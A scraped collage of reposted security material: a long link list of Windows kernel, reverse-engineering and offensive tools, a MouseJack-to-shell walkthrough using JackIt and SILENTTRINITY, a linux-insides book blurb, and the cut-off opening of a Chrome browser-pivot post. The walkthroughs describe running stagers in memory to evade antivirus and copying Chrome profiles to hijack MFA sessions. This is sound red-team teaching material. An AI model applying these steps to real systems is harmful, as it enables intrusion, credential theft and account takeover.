https://github.com/wirepair/IDAPinLogger https://github.com/BinaryAnalysisPlatform/bap-ida-python https://github.com/alexander-pick/patchdiff2_ida6 https://github.com/ecx86/classinformer-ida7 https://github.com/nccgroup/SusanRTTI https://github.com/gaasedelen/prefix https://github.com/andreafioraldi/IDAngr https://github.com/Cr4sh/IDA-VMware-GDB https://github.com/Comsecuris/ida_strcluster https://github.com/airbus-seclab/bincat https://github.com/a1ext/auto_re https://github.com/gynophage/solarized_ida https://github.com/luorui110120/IDAplugins https://github.com/0xItx/ida_nightfall https://github.com/xorpd/idsearch https://github.com/nihilus/IDASimulator https://github.com/dude719/SigMaker-x64 https://github.com/fireeye/SimplifyGraph https://github.com/google/binexport https://github.com/deresz/funcap https://github.com/IOActive/kmdf_re http://www.h4ck.org.cn/2011/07/ida-pe6-dll-unpack/ https://www.anquanke.com/post/id/151898 https://www.anquanke.com/post/id/85890 https://www.cnblogs.com/17bdw/p/7785469.html https://4hou.win/wordpress/?cat=1178 (pin & ida) https://wizardforcel.gitbooks.io/grey-hat-python/ http://spd.dropsec.xyz/2016/10/05/IDAPython%E5%AE%89%E8%A3%85/ http://spd.dropsec.xyz/2017/04/09/%E7%AC%A6%E5%8F%B7%E6%89%A7%E8%A1%8C-%E5%9F%BA%E4%BA%8Epython%E7%9A%84%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%88%86%E6%9E%90%E6%A1%86%E6%9E%B6angr/ http://spd.dropsec.xyz/2016/10/16/IDAPython%E8%84%9A%E6%9C%AC%E4%B9%8B%E6%94%B6%E9%9B%86%E5%87%BD%E6%95%B0%E7%9A%84%E8%B0%83%E7%94%A8%E4%BF%A1%E6%81%AF/ http://www.freebuf.com/sectool/92107.html http://www.freebuf.com/sectool/92168.html http://www.freebuf.com/articles/system/92488.html http://www.freebuf.com/articles/system/92505.html http://www.freebuf.com/articles/system/93440.html https://www.fortinet.com/blog/threat-research/rewriting-idapython-script-objc2-xrefs-helper-py-for-hopper.html https://sark.readthedocs.io/en/latest/debugging.html https://cartermgj.github.io/2017/10/10/ida-python/ https://security.tencent.com/index.php/blog/msg/4 https://wingware.com/doc/howtos/idapython http://www.somersetrecon.com/blog/2018/7/6/introduction-to-idapython-for-vulnerability-hunting http://0xeb.net/2018/02/writing-a-simple-x86-emulator-with-idapython/ http://0xeb.net/2018/02/writing-a-simple-x86-emulator-with-idapython/ https://resources.infosecinstitute.com/saving-time-effort-idapython/#gref https://www.thezdi.com/blog/2018/5/21/mindshare-walking-the-windows-kernel-with-ida-python https://www.thezdi.com/blog/2018/7/19/mindshare-an-introduction-to-pykd https://www.thezdi.com/blog/2018/6/26/mindshare-variant-hunting-with-ida-python http://www.mopsled.com/2016/add-shortcut-for-idapython-script-ida-pro/ http://blog.sina.com.cn/s/blog_9f5e368a0102wnmm.html https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/october/python-class-informer-an-idapython-plugin-for-viewing-run-time-type-information-rtti/ https://www.pydoc.io/pypi/python-idb-0.4.0/autoapi/analysis/index.html https://securityxploded.com/api-call-tracing-with-pefile-pydbg-and-idapython.php https://www.cnblogs.com/0xJDchen/p/7527236.html http://www.williballenthin.com/blog/2015/09/04/idapython-synchronization-decorator/ https://www.fireeye.com/blog/threat-research/2015/01/flare_ida_pro_script.html https://bbs.pediy.com/thread-226983.htm https://www.trustwave.com/Resources/SpiderLabs-Blog/Defeating-Flame-String-Obfuscation-with-IDAPython/ https://www.anquanke.com/post/id/151898 https://edoc.site/idapython-bookpdf-pdf-free.html https://serializethoughts.com/tag/idapython/ https://exploiting.wordpress.com/2011/12/06/quickpost-idapython-script-to-identify-unrecognized-functions/ http://barbie.uta.edu/~xlren/Diaphora/diaphora_help.pdf https://www.jianshu.com/p/ee789e8acb03 http://blog.51cto.com/watertoeast/2084700 http://blog.51cto.com/watertoeast/1352787 https://blog.clamav.net/2014/02/generating-clamav-signatures-with.html https://www.mnin.org/write/2006_extract_xor.pdf http://www.hexacorn.com/blog/2015/12/21/idapython-making-strings-decompiler-friendly/ http://standa-note.blogspot.com/2015/01/arm-exception-handling-and-idapython.html http://codegist.net/code/idapython-script/ https://reverseengineering.stackexchange.com/questions/16055/idapython-get-xrefs-to-a-stack-variable pykd https://github.com/sogeti-esec-lab/LKD https://www.anquanke.com/post/id/86909 https://www.anquanke.com/post/id/86896 https://www.anquanke.com/post/id/83205 https://blog.csdn.net/jimoguilai/article/details/25286029 https://blog.csdn.net/jimoguilai/article/details/29827283 https://blog.csdn.net/jimoguilai/article/details/38122863 https://blog.csdn.net/linux_vae/article/details/77532758 https://blog.csdn.net/linux_vae/article/details/77532758 https://blog.csdn.net/ambihan/article/details/35775933 https://www.zerodayinitiative.com/blog/2018/7/19/mindshare-an-introduction-to-pykd https://www.cnblogs.com/fanzi2009/archive/2012/12/10/2811543.html https://cloud.tencent.com/developer/article/1005628 http://eternalsakura13.com/2018/07/03/firefox_env/ https://binvoke.com/inline-assembly-in-x64/ https://webstersprodigy.net/2014/01/06/soft-function-hooking-with-windbg-and-pykd/ https://rayanfam.com/topics/pykd-tutorial-part1/ https://rayanfam.com/topics/pykd-tutorial-part2/ https://labs.mwrinfosecurity.com/blog/heap-tracing-with-windbg-and-python/ http://www.miguelventura.pt/scripting-windbg-with-pykd.html https://labs.nettitude.com/blog/windbg-using-pykd-to-dump-private-symbols/ https://webstersprodigy.net/2014/01/06/soft-function-hooking-with-windbg-and-pykd/ https://www.cnblogs.com/fanzi2009/archive/2012/12/10/2811543.html http://www.freebuf.com/articles/system/103816.html https://bbs.pediy.com/thread-224904.htm http://theevilbit.blogspot.com/2017/09/pool-spraying-fun-part-1.html http://theevilbit.blogspot.com/2017/09/windows-kernel-pool-spraying-fun-part-2.html http://theevilbit.blogspot.com/2017/09/windows-kernel-pool-spraying-fun-part-3.html http://theevilbit.blogspot.com/2017/09/windows-kernel-pool-spraying-fun-part-4.html rpc https://github.com/gentilkiwi/basic_rpc hash dump https://github.com/AlessandroZ/LaZagneForensic https://github.com/AlessandroZ/LaZagne (browser credentials recovery) https://github.com/gentilkiwi/mimikatz auxiliary lib https://github.com/David-Reguera-Garcia-Dreg/auxlib ring3 nt api https://github.com/adrianyy/x64-syscall https://github.com/icestudent/ontl https://www.vergiliusproject.com/kernels https://github.com/DissectMalware/WinNativeIO https://github.com/zodiacon/WindowsInternals/tree/master/MemLimit/ndk https://github.com/codereversing/wow64syscall https://github.com/processhacker/phnt https://github.com/ntdiff/ntdiff https://ntdiff.github.io https://github.com/ntdiff/headers https://github.com/Chuyu-Team/NativeLib winpcap http://libtins.github.io/tutorial/ https://github.com/abapat/DNSPoison http://www.ferrisxu.com/WinPcap/html/index.html https://github.com/wqqhit/DNSHijack https://github.com/klemenb/fiddly http://blog.csdn.net/Ni9htMar3/article/details/54612394 https://www.cnblogs.com/xcj26/articles/6073411.html http://www.freebuf.com/articles/system/103526.html https://github.com/illahaha/zxarps (arpcheat) https://github.com/sincoder/zxarps (arpcheat) metasploit https://github.com/phackt/stager.dll https://github.com/ExpLife/metasploit-framework https://github.com/NytroRST/NetRipper https://github.com/breenmachine/RottenPotatoNG shellcode encoder https://github.com/ecx86/shellcode_encoder shadow https://github.com/lcxl/lcxl-shadow network lib https://github.com/zhllxt/asio2 http https://github.com/vlinhd11/WinHttpClass https://github.com/hpsocket/restclient-cpp https://github.com/farawaaay/http2 (http/2) https://github.com/OlehKulykov/libnhr https://github.com/erickutcher/httpdownloader https proxy http://anyproxy.io/cn/ https://github.com/killbug2004/HttpsProxy https://github.com/erickutcher/httpproxy sock proxy https://github.com/liulilittle/PaperAirplane mitm https://github.com/zliu-fd/WinDivertProxy https://github.com/sipt/shuttle (GO) https://github.com/conorpp/MiTM-HTTP-Proxy https://github.com/moxie0/sslsniff https://github.com/wuchangming/node-mitmproxy https://github.com/hostilefork/flatworm https://github.com/progtramder/webproxy https://github.com/empijei/wapty https://github.com/xxxxnnxxxx/HttpProxy https://github.com/astibal/smithproxy https://github.com/TechnikEmpire/CitadelCore https://github.com/TechnikEmpire/HttpFilteringEngine https://blog.csdn.net/kunyus/article/details/78679717 https://github.com/liuyufei/SSLKiller http://blog.csdn.net/Tencent_Bugly/article/details/72626127 https://github.com/pfussell/pivotal ssl https://github.com/edwig/SSLSocket json https://github.com/ez8-co/xpjson https://github.com/marcusbotacin/MyJSON serialization https://github.com/ez8-co/es11n awesome https://github.com/wcventure/FuzzingPaper https://github.com/fr0gger/awesome-ida-x64-olly-plugin https://github.com/Ridter/Intranet_Penetration_Tips https://github.com/danielmiessler/SecLists https://github.com/yeyintminthuhtut/Awesome-Red-Teaming https://github.com/REMath/literature_review https://github.com/phith0n/Mind-Map https://github.com/CHYbeta/Software-Security-Learning https://github.com/0x4D31/awesome-threat-detection https://github.com/Escapingbug/awesome-browser-exploit https://github.com/CaledoniaProject/awesome-opensource-security https://github.com/rshipp/awesome-malware-analysis https://github.com/lmy375/awesome-vmp https://github.com/ksluckow/awesome-symbolic-execution https://github.com/szysec/ctftest https://stackoverflow.com/questions/4946685/good-tutorial-for-windbg https://github.com/rmusser01/Infosec_Reference https://github.com/sam-b/windows_kernel_resources https://github.com/EbookFoundation/free-programming-books https://github.com/justjavac/free-programming-books-zh_CN https://github.com/rmusser01/Infosec_Reference/ https://github.com/jshaw87/Cheatsheets https://github.com/RPISEC/MBE windows Driver Kit ddi (device driver interface) documentation https://docs.microsoft.com/zh-cn/windows-hardware/drivers/ddi/ https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-scripting-preview windbg preview & jsprovider https://github.com/Microsoft/WinDbg-Samples https://bbs.pediy.com/thread-246449.htm http://doar-e.github.io/blog/2017/12/01/debugger-data-model/ anti-anti-vm https://github.com/hzqst/VmwareHardenedLoader vm https://github.com/etsubu/NanoVM (x64) https://github.com/tboox/vm86 spy++ https://github.com/strobejb/winspy pe tool https://www.pelock.com/products/string-encrypt https://www.pelock.com/products/obfuscator https://github.com/hasherezade/hollows_hunter (scan hook) https://github.com/hasherezade/pe-sieve https://github.com/hasherezade/bearparser https://github.com/hasherezade/libpeconv https://github.com/hasherezade/malware_analysis https://github.com/hasherezade/libpeconv_project_template https://github.com/hasherezade/libpeconv_wrappers https://github.com/hasherezade/process_doppelganging https://github.com/hasherezade/bee_parser https://github.com/hasherezade/pe_to_shellcode https://github.com/hasherezade/mal_unpack https://github.com/hasherezade/process_chameleon (modify exe path) https://github.com/hasherezade/loaderine https://github.com/hasherezade/chimera_loader https://github.com/YajS/NikPEViewer tools https://github.com/glmcdona/strings2 http://bytepointer.com/tools/index.htm#peupdate https://github.com/endgameinc/xori (Dissasemblers blackhat 2018) http://www.softpedia.com/get/Programming/Debuggers-Decompilers-Dissasemblers/ post-exploitation https://github.com/francisck/DanderSpritz_lab https://github.com/francisck/DanderSpritz_docs nsa security tools https://github.com/exploitx3/FUZZBUNCH https://github.com/fuzzbunch/fuzzbunch https://github.com/peterpt/fuzzbunch apt https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections https://github.com/kbandla/APTnotes https://attack.mitre.org/wiki/Groups https://github.com/fdiskyou/threat-INTel 3rd party library https://github.com/ez8-co/ezpp https://github.com/ez8-co/emock https://github.com/ez8-co/atomic https://github.com/ez8-co/linked_hash https://github.com/asmjit/asmjit (jit) https://github.com/acl-dev/acl https://github.com/kingsamchen/WinAntHttp https://github.com/kingsamchen/KAdBlockEngine https://github.com/kingsamchen/KLog https://github.com/kingsamchen/Eureka https://zh-cn.libreoffice.org/ https://github.com/GiovanniDicanio/WinReg https://github.com/GiovanniDicanio/StopwatchWin32 https://github.com/Wintellect/ProcMonDebugOutput https://github.com/GiovanniDicanio/ReadStringsFromRegistry https://github.com/GiovanniDicanio/Utf8ConvAtlStl https://github.com/GiovanniDicanio/StringPool https://github.com/GiovanniDicanio/MapWithCaseInsensitiveStringKey https://github.com/GiovanniDicanio/SafeArraySamples https://github.com/GiovanniDicanio/TestSSO https://github.com/GiovanniDicanio/DoubleNulTerminatedString https://github.com/GiovanniDicanio/LoadingCedictBenchmarkCpp https://github.com/GiovanniDicanio/TestStringSorting https://github.com/GiovanniDicanio/UnicodeConversions https://github.com/GiovanniDicanio/TestStringsAtlVsStl https://github.com/GiovanniDicanio/UnicodeConversionAtl https://github.com/GiovanniDicanio/StlVectorVsListPerformance rpc https://github.com/houjingyi233/ALPC-fuzz-study https://github.com/muxq/hellorpc adblock https://github.com/adblockplus/adblockplusie https://github.com/adblockplus/adblockpluscore https://github.com/adblockplus/libadblockplus miscellaneous https://github.com/theopolis/uefi-firmware-parser https://github.com/z175/kdmapper https://github.com/heckerli/netshield https://github.com/TalAloni/SMBLibrary https://www.unknowncheats.me/forum/c-and-c-/179852-ring0-random-string-generator-kernel-driver.html https://github.com/gztss/SerialTool (serial debug tool) https://github.com/platomav/CPUMicrocodes https://github.com/DavexPro/PocHunter https://github.com/Microsoft/Windows-universal-samples https://github.com/ionescu007/wnfun https://github.com/waryas/UMPMLib https://github.com/MeeSong/Windows_OS_Internals_Curriculum_Resource_Kit-ACADEMIC https://github.com/piaoyunsoft/WebRedemption https://github.com/sudoconf/http_encode https://github.com/wjcsharp/wintools https://github.com/nmgwddj/HttpSourceViewer https://github.com/nmgwddj/nvapi-example (Digital Vibrance Controls) https://github.com/n1nj4sec/memorpy https://github.com/TinyCC/tinycc https://github.com/msuhanov/regf (reg formats) https://github.com/beader/tianchi-3rd_security https://github.com/Schnocker/HLeaker http://www.geoffchappell.com/studies/windows/km/index.htm (reverse) https://github.com/AntiRootkit/HandleSpy https://github.com/securifera/HeapMonitor https://github.com/securifera/serviceFu https://github.com/mq1n/WSWatcher https://github.com/imagemlt/EasyKnife (CKnife) https://github.com/didi/kemon (macOS Kernel Monitoring Callback Framework) https://github.com/Microsoft/microsoft-pdb (pdb format) https://github.com/Darm64/XNU https://github.com/netromdk/bmod https://github.com/rgl/windows-domain-controller-vagrant https://github.com/panda-re/panda https://github.com/DarkSpiritz/DarkSpiritz https://rayanfam.com/topics/inline-assembly-in-x64/ (x64 inline asm) https://www.jianshu.com/p/15be72d919ff (traversing the icon on the desktop) https://github.com/nshalabi/SysmonTools https://github.com/nshalabi/ATTACK-Tools https://github.com/ExpLife0011/hf-2012 https://github.com/tyranid/windows-attacksurface-workshop/ (2018) https://github.com/CherryPill/system_info https://github.com/muxq/DPAPI https://github.com/ExpLife/directntapi https://github.com/gaozan198912/myproject https://github.com/k0keoyo/ntoskrnl-symbol-pdb-and-undocument-structures https://github.com/gentilkiwi/p11proxy https://github.com/gentilkiwi/kekeo https://github.com/ExpLife/ByPassCfg https://github.com/hfiref0x/SXSEXP https://github.com/hfiref0x/VBoxHardenedLoader https://github.com/hfiref0x/SyscallTables https://github.com/hfiref0x/WinObjEx64 https://github.com/Cr4sh/DbgCb https://github.com/Cr4sh/s6_pcie_microblaze https://github.com/ionescu007/SpecuCheck https://github.com/ionescu007/lxss https://github.com/intel/haxm https://github.com/akayn/Resources https://github.com/DarthTon/SecureEraseWin https://github.com/hfiref0x/UACME https://github.com/tinysec/windows-syscall-table https://github.com/tinysec/jsrt https://github.com/zodiacon/DriverMon https://github.com/zodiacon/GflagsX https://github.com/zodiacon/PEExplorer https://github.com/zodiacon/KernelExplorer https://github.com/zodiacon/AllTools https://github.com/zodiacon/WindowsInternals https://github.com/hackedteam/vector-silent https://github.com/hackedteam/core-packer https://github.com/hackedteam/vector-recover https://github.com/k33nteam/cc-shellcoding https://github.com/rwfpl/rewolf-wow64ext https://github.com/rwfpl/rewolf-x86-virtualizer https://github.com/rwfpl/rewolf-gogogadget https://github.com/rwfpl/rewolf-dllpackager https://github.com/Microsoft/ChakraCore https://github.com/google/symboliclink-testing-tools https://github.com/ptresearch/IntelME-JTAG https://github.com/smourier/TraceSpy https://github.com/G-E-N-E-S-I-S/tasklist-brutus https://github.com/G-E-N-E-S-I-S/token_manipulation https://github.com/jjzhang166/sdk https://github.com/killswitch-GUI/HotLoad-Driver https://github.com/killswitch-GUI/minidump-lib https://github.com/killswitch-GUI/win32-named-pipes-example https://github.com/Kelvinhack/ScreenCapAttack https://github.com/tyranid/oleviewdotnet https://github.com/tyranid/CANAPE.Core https://github.com/tyranid/DotNetToJScript slides https://rmusser.net/docs/ https://keenlab.tencent.com/zh blogs http://kdext.com/links.html http://www.reconstructer.org/papers/Hunting%20rootkits%20with%20Windbg.pdf https://www.slideshare.net/MSbluehat/bluehat-v18-memory-resident-implants-code-injection-is-alive-and-well https://www.sekoia.fr/blog https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/single-binary-opt-in-pool-nx-optin (VS WDK Config) https://blog.csdn.net/qq_18218335/article/details/77480475 (VS WDK Config) https://docs.microsoft.com/zh-cn/previous-versions//jj572863(v=vs.85) (VS WDK Config) https://blog.csdn.net/lpwstr/article/details/81190171 (VS WDK Config) http://www.yiiyee.cn/Blog/win8-driver/ https://blog.csdn.net/liwen930723 https://ktkitty.github.io/ (vul) https://secrary.com/RandomPosts http://www.mycode.net.cn/ http://split-code.com http://eternalsakura13.com https://xiaodaozhi.com/ https://blog.vicayang.cc/ https://www.fwhibbit.es/sysmon-the-big-brother-of-windows-and-the-super-sysmonview https://dedbg.com/ https://leguanyuan.blogspot.com http://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/profile/bugdemo.htm https://blog.can.ac https://b33t1e.github.io/2018/01/03/About-VMProtect/ http://www.diting0x.com/ http://lotabout.me/archives/ (write a c interpreter) http://2997ms.com/2016/10/09/2016/2016-9%E6%9C%88-%E5%90%AD%E5%93%A7%E5%92%94%E5%93%A7/ http://www.trueai.cn/ https://whereisk0shl.top https://www.anquanke.com/post/id/97245 https://lifeinhex.com https://vallejo.cc/2017/11/18/installation-and-first-contact-with-the-new-windbg/ http://www.vxjump.net/ https://channel9.msdn.com/Shows/Defrag-Tools http://windbg.info/ http://windbg.org/ https://msdn.microsoft.com/en-us/library/windows/hardware/ff553217(v=vs.85).aspx http://www.andreybazhan.com/ https://blogs.technet.microsoft.com/markrussinovich/ http://undocumented.ntinternals.net/ http://j00ru.vexillium.org/ https://sysprogs.com/ http://www.rohitab.com/ https://sww-it.ru/ http://blogs.microsoft.co.il/pavely/ https://www.corelan.be/ http://tombkeeper.blog.techweb.com.cn/ http://www.zer0mem.sk/ http://blog.rewolf.pl/blog/ http://www.alex-ionescu.com/ http://blog.cr4.sh/ https://rootkits.xyz/ https://ixyzero.com/blog/archives/3543.html https://whereisk0shl.top/ http://www.triplefault.io/2017/09/enumerating-process-thread-and-image.html http://doar-e.github.io/blog/2017/12/01/debugger-data-model/ https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-using-windbg-preview https://blog.xpnsec.com/ https://www.fireeye.com/blog/threat-research/2018/01/simplifying-graphs-in-ida.html http://gosecure.net/2018/01/10/vmware-horizon-v4h-v4pa-desktop-agent-privilege-escalation-vulnerability-cve-2017-4946/ http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation sec tools https://securityxploded.com waf https://github.com/SpiderLabs/ModSecurity web security research site http://malware-traffic-analysis.net https://malwaretips.com/ https://www.sec-wiki.com https://www.anquanke.com/ http://xuanwulab.github.io/cn/secnews/2018/02/08/index.html http://www.vxjump.net/ https://www.pediy.com/ https://navisec.it/ http://www.secbang.com/ development documents http://devdocs.io/ https://zealdocs.org/ browser automated test https://github.com/florentbr/SeleniumBasic docker http://dockone.io/search/q-RG9ja09uZeaKgOacr+WIhuS6qw==#articles leaked source code https://github.com/misterch0c/shadowbroker (NSA) https://github.com/pustladi/Windows-2000 https://github.com/killbug2004/NT_4.0_SourceCode https://github.com/pustladi/TrueCrypt-7.2 https://github.com/pustladi/MS-DOS-v.1.1 https://github.com/pustladi/MS-DOS-v.2.0 sspi https://github.com/deemru/msspi https://github.com/vletoux/DetectPasswordViaNTLMInFlow https://github.com/judek/sspiauthenticate https://github.com/BobCatC/xSspi https://github.com/sishtiaq/SampleSSPICode https://github.com/liamkirton/sslpyfilter https://github.com/bschlenk/gsspp openssl https://github.com/square/certstrap (go) https://github.com/hioa-cs/IncludeOS/blob/fd92a5394b493b5b645b2123966d38c1576df250/src/net/https/openssl_server.cpp#L72 https://github.com/robertblackwell/marvincpp https://github.com/equalitie/ouinet https://github.com/LiTianjue/mite-note https://blog.csdn.net/dotalee/article/details/78041691 https://www.cnblogs.com/kennyhr/p/3746048.html pdb https://github.com/wbenny/pdbex gpu https://github.com/Volkanite/Push crypto api https://github.com/maldevel/AES256 https://github.com/wbenny/mini-tor https://github.com/wyrover/CryptoAPI-examples https://github.com/fmuecke/CryptoApi https://github.com/ViartX/CacheCrypto https://github.com/Deerenaros/CryptoAPIWrapper https://github.com/maldevel/SHA256 https://github.com/13g10n/crypto ipc https://github.com/fangqing/PipeLink https://github.com/e3ntity/windows_named_pipe_ipc iot sec https://iot.sec-wiki.com/ ascii banner http://www.network-science.de/ascii/ http://www.degraeve.com/img2txt.php book code https://github.com/yifengyou/32to64 https://github.com/elephantos/elephant https://github.com/yifengyou/Android-software-security-and-reverse-analysis https://github.com/yifengyou/Code-virtualization-and-automation-analysis https://github.com/yifengyou/Software-protection-and-analysis-techniques---principles-and-practices https://github.com/yifengyou/X86-assembly-language-from-real-mode-to-protection-mode regex https://github.com/zeeshanu/learn-regex paper https://github.com/tyranid/WindowsRuntimeSecurityDemos https://translation-zh-cn.readthedocs.io/zh_CN/ https://speakerdeck.com ebook https://github.com/xuanhun/PythonHackingBook1 https://github.com/xapax/security https://github.com/chryzsh/DarthSidious (AD Domain hack) https://github.com/chryzsh/practical-hacking http://www.foxebook.net/ pentest https://github.com/l3m0n/pentest_study https://github.com/l3m0n/pentest_tools https://github.com/l3m0n/linux_information wpad/pac http://www.devnotes.in/2014/11/08/auto-proxy-settings-with-PAC.html http://www.lybbn.cn/data/datas.php?yw=76 https://blog.huzhifeng.com/2017/07/16/PAC/ https://github.com/manugarg/pacparser js obfuscator/deobfuscator https://beautifier.io/ https://tool.lu/js/ https://www.52pojie.cn/thread-128803-1-1.html http://www.kahusecurity.com/2011/javascript-deobfuscation-tools-part-1/ http://www.kahusecurity.com/2011/javascript-deobfucation-tools-part-2/ http://deobfuscatejavascript.com/ http://js.pnote.net/#/js decompiler https://github.com/wargio/r2dec-js (asm to c) encryption/decryption tools https://www.devglan.com english https://github.com/yujiangshui/An-English-Guide-for-Programmers library https://www.ctolib.com/ awesome-windows-kernel-security-development Sursa: https://github.com/ExpLife0011/awesome-windows-kernel-security-development/blob/master/README.md

Mar 10, 2019 | 0 comments MouseJack: From Mouse to Shell – Part 2 This is a continuation of Part 1 which can be found here. New/Fixed Mice Since the last blog post, I’ve done some additional testing and it looks like most of the newer wireless mice are not vulnerable to MouseJack. I tested the best-selling wireless mouse on Amazon (VicTsing MM057), Amazon’s choice (AmazonBasics), and one of my favorites (Logitech M510). All three mice were not vulnerable to MouseJack. If you have a wireless mouse that cannot be patched or you are not sure how to patch it, and the mouse is older than 2017 buy a new mouse/keyboard. If you bought and tested a new mouse against MouseJack, please let me know so I can update this post. Accept the Risk or Fix the Issue? I’m still curious on how organizations are going to remedy this vulnerability across their environment. To my knowledge, you can identify the manufacturer and model from Device Manager, but because we don’t have a list of all known vulnerable mice, it’s hard to say if a particular mouse is vulnerable or not. For example, I have an old Logitech M510 that isn’t patched and a brand new Logitech M510 that is patched. From the OS level, how do we detect the difference? It would be almost impossible to validate vulnerable wireless mice/keyboards across a 60k seat enterprise. What are you doing to remedy this vulnerability or are you accepting the risk? Please comment below or reach out to me directly. From Mouse to Shell – Undetected by Defender See Part 1 to setup JackIt and CrazyRadio PA. This time, we will use JackIt and a tool known as SILENTTRINITY. SILENTTRINITY was created by Marcello Salvati (@byt3bl33d3r) in 2018. Here’s a talk Marcello gave at DerbyCon and here’s a link to his GitHub. Black Hills (BHIS) did a Webcast a few weeks ago where they did a deep dive on SILENTTRINITY, which can be found here. I won’t go into how this exactly works, but please check out the BHIS Webcast or the DerbyCon talk above for more info. Installing Dependencies Install Kali cd /opt git clone GitHub URL cd impacket pip install -r requirements.txt python setup.py install I ran into issues running this command due to the wrong version of ldap3 (see screenshot below). To fix this, run the following commands: pip2 install ldap3==2.5.1 pip2 uninstall ldap3==2.5.2 reboot? re-run step 6, it should now install successfully Installing SILENTTRINITY apt install python3.7 python3.7-dev python3-pip cd /opt git clone GitHub URL cd SILENTTRINITY/Server python3.7 -m pip install -r requirements.txt If all went well, SILENTTRINITY should be installed. Running SILENTTRINITY Start up SILENTTRINITY by running – python3.7 st.py Run the help command to see our options Review listener options Setup the listener Create the stager – I’m using powershell here, wmic is detected by Defender and msbuild requires msbuild.exe on the attack system. The stager is located in /opt/SILENTTRINITY/Server Move the stager to a HTTPS location where the file can be downloaded. Make sure you use HTTPS and not HTTP, as at least one AV vendor accidentally identifies this stager as Sparc shellcode (wtf?). Using HTTPS bypasses this Snort signature. Download and execute the stager using JackIt Once you have your session you can run modules against the compromised system. Type modules and then type list. These modules are quite powerful and allow you to run mimikatz (make sure you’re running in an elevated process), enumeration scripts, powershell, cmd, winrm, inject shellcode, exfil via github, etc. Here is an example of hostenum – which grabs sys info, av check, user groups, env variables, ipconfig, netstat and current processes. Summary: Using JackIt with SILENTTRINITY we are able to bypass Defender. I’d like to note that downloading stager.ps1 through the browser caused Defender to block the download but was able to bypass Defender by downloading and running the stager in memory. I was actually quite surprised this bypassed Defender, so I had to try it on a few other systems. I was able to bypass all 3 AV/EDR vendors using this technique; although, at least one EDR system, detected suspicious powershell usage (i.e., powershell downloaded something and ran it). Therefore, if you are able to deliver the stager another way such as say, over smb, you may be able to bypass at least a few AV/EDR. I didn’t cover the msbuild stager during this post, but if you really wanted to bypass AV/EDR try this type of stager. As long as msbuild.exe is installed on the attack system, you should be good to go (at least for now :)). In Part 3, I’ll cover the blue team side of this, as far as what to look for and how to detect SILENTTRINITY. Unfortunately, there is not an easy way to detect JackIt AFAIK. If you know of a detection mechanism for JackIt/MouseJack, please contact me so I can include it in Part 3. Sources hunter2 gitbook impacket GitHub SILENTTRINITY DerbyCon BHIS Webcast JackIt GitHub Featured Image – Bastille Sursa: https://www.jimwilbur.com/2019/03/mousejack-from-mouse-to-shell-part-2/

linux-insides A book-in-progress about the linux kernel and its insides. The goal is simple - to share my modest knowledge about the insides of the linux kernel and help people who are interested in linux kernel insides, and other low-level subject matter. Feel free to go through the book Start here Questions/Suggestions: Feel free about any questions or suggestions by pinging me at twitter @0xAX, adding an issue or just drop me an email. Mailing List We have a Google Group mailing list for learning the kernel source code. Here are some instructions about how to use it. Join Send an email with any subject/content to kernelhacking+subscribe@googlegroups.com. Then you will receive a confirmation email. Reply it with any content and then you are done. If you have Google account, you can also open the archive page and click Apply to join group. You will be approved automatically. Send emails to mailing list Just send emails to kernelhacking@googlegroups.com. The basic usage is the same as other mailing lists powered by mailman. Archives https://groups.google.com/forum/#!forum/kernelhacking Support Support If you like linux-insides you can support me with: On other languages Brazilian Portuguese Chinese Japanese Korean Russian Spanish Turkish Contributions Feel free to create issues or pull-requests if you have any problems. Please read CONTRIBUTING.md before pushing any changes. Author @0xAX LICENSE Licensed BY-NC-SA Creative Commons. Sursa: https://0xax.gitbooks.io/linux-insides/

Browser Pivot for Chrome March 11, 2019 ~ cplsec Hey all, Today’s post is about Browser Pivoting with Chrome. For anyone unaware of Browser Pivoting, it’s a technique which essentially leverages an exploited system to gain access to the browser’s authenticated sessions. This is not a new technique, in fact, Raphael Mudge wrote about it in 2013. Detailed in the linked post, the Browser Pivot module for Cobalt Strike targets IE only, and as far as I know, cannot be used against Chrome. In this post we’re trying to achieve a similar result while taking a different approach – stealing the target’s Chrome profile in real time. Just a FYI, if you have the option to use Cobalt Strike’s Browser Pivot module instead, do so, it’s much cleaner. You might be thinking – “why go through the trouble?” If I’ve exploited the system I can mimikatz or keylog to get the target’s credentials and by extension, the resources they have access to. Well, one major application that comes to mind is multi-factor authentication (MFA). Organizations are catching on that a single password alone is not nearly sufficient in protecting valued network resources, which is fantastic news! Personally, I have the opportunity to do offensive engagements on OT targets which often have multiple tiers of authentication and networking; it’s my generalization that MFA-less sites tend to fall much quicker than MFA sites – hours or days vs weeks or not at all, respectively. In my opinion, MFA at a security boundary is one of the most important security controls one can implement. You also might be thinking – “here you are touting the potency of MFA, yet you are talking about hijacking MFA sessions”. Again, this technique has been around since 2013 and the specific code developed for this PoC is all publicly accessible. Advanced adversaries have access to and are most likely employing this technique. Our offensive engagements need to emulate these threats because that’s how we get better from a defensive standpoint – steel sharpens steel. How To Defend First off, if you’ve forced an attacker to go beyond traditional credential theft to gain access to critical network resources, congratulations! This walkthrough has quite a few (loud) indicators that can point to malicious activity. We’re starting and stopping services, modifying system32 files, modifying registry, creating and deleting VSS snapshots, and ending it with a remote desktop session to the target. All this activity can easily be detected. What Does It Do? High level, this PoC attempts to do the following: Modify the system to allow multiple Remote Desktop connections and remove RemoteApp restrictions. Using VSS, copy the target’s in-use Chrome profile to another file folder. Using RemoteApp and proxychains, remotely open a Chrome instance pointing to that copied profile path. If you prefer, I think the profile could be copied over to the attacking VM and leveraged using proxychains and chromium. That being said, I would imagine this type of technique is time sensitive. Code To all the readers – this is proof of concept code, use at your own risk. ThunderRApp modifies system32 files and ThunderVSS interfaces with VSS. Just a recommendation, don’t run (shoddy) code from some rando on the internet without testing it first. ThunderChrome ThunderRApp (x64 DLL) – Modifies the system to accept multiple RDP and RemoteApp sessions ThunderVSS (x64 DLL) – Copies the target Chrome profile using VSS to get around file locks. ThunderChrome.cna – Aggressor script which runs the DLLs Enumerate Chrome Tabs (Not Included) Scenario The attackers once again have a foothold on BLANPC-0004 under the context of 